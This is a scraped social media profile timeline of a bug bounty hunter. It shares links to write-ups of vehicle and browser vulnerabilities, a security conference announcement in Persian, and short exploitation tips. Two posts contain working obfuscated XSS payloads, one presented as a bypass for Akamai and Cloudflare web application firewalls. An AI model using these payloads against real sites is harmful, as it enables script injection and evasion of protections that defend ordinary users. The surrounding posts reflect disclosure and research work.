Security enthusiast
Joined February 2023
- Tweets 103
- Following 584
- Followers 1,138
- Likes 713
14 Photos and videos
Hacking Google with A.I. for $500,000
brutecat.com/r/hacking-googl…
59
500
2,457
322,225
Radman retweeted
Feb 23
It's time for sharing, this is not a simple write-up, we are sharing our methodology and reasoning, detailing how we approached and hunted the flaw, I hope you like it :]
blog.voorivex.team/uxss-on-s…
Feb 20
We got permission from the Samsung Security team to disclose this uXSS that we found in Samsung Browser, it was assigned a CVE (CVE-2025-58485) and patched.
Here is the PoC, expect the write-up in the next upcoming days.
12
54
333
25,253
I just found a WAF bypass for Akamai and Cloudflare:
<address onscrollsnapchange=window['ev' 'a' (['l','b','c'][0])](window['a' 'to' (['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>
14
190
1,363
82,312
rXSS via url parameter
1. I discovered reflection in a URL parameter
2. All inputs I submitted were being HTML encoded
3. I submitted the following input: https://sss'"<>, and in the response, my payload was displayed without proper sanitization.
#xss #BugBounty #infosec
4
25
205
9,960
Two of the best🔥🔥
30 Apr 2025
first time participating in NahamCon. I’ll cover a practical attack scenario I've made $50K with. Hope everything goes well for me
6
1,363
در جلسهای که با اعضای وزارت داشتم، آسیبپذیری بههمراه اکسپلویت آن گزارش شد. قرار است این آسیبپذیری بهزودی برطرف شود.
به امید اینترنتی امنتر.
یه باگی روی یکی از وزارتخونهها زدم که میتونم به تمام اطلاعات کاربرهاشون دسترسی پیدا کنم و چند بار هم بهشون ایمیل زدم ولی جواب ندادن. الان یک ساله که این باگ وجود داره
نمیدونم چی بگم پرام ریخته از این مملکت
7
110
7,807
New blog post with @infosec_au:
We found a vulnerability in Subaru where an attacker, with just a license plate, could retrieve the full location history, unlock, and start vehicles remotely.
The issue was reported and patched.
Full post here: samcurry.net/hacking-subaru
47
312
1,027
118,248
To initiate mediation on HackerOne, you need to submit a mediation request first.
@Hacker0x01
1
33
3,281
سلام با کلی بالا و پایین و پارگی تصمیم گرفتیم یه کنفرانس امنیتی/هانتری برگزار کنیم، امیدواریم که حرکت مثبتی باشه. تاریخ ۲۴ و ۲۵ آبان برگزار میشه، برای ارسال مقالات تا ۴ آبان وقت هست. یه سری موارد هم نمیگیم که سورپرایزطور باشه. کلیه جزئیات توی سایت:
vooricon.com
27
56
467
117,400
New writeup from @_specters_ and I: we're finally allowed to disclose a vulnerability reported to Kia which would've allowed an attacker to remotely control almost all vehicles made after 2013 using only the license plate.
Full disclosure:
samcurry.net/hacking-kia
86
973
3,544
344,280
Payload: </sc</script>ript><style>@keyframes x{}</style><xss style='animation-name:x' onanimationend=eval?.(atob('Base64encodeEXP))>
17
1,507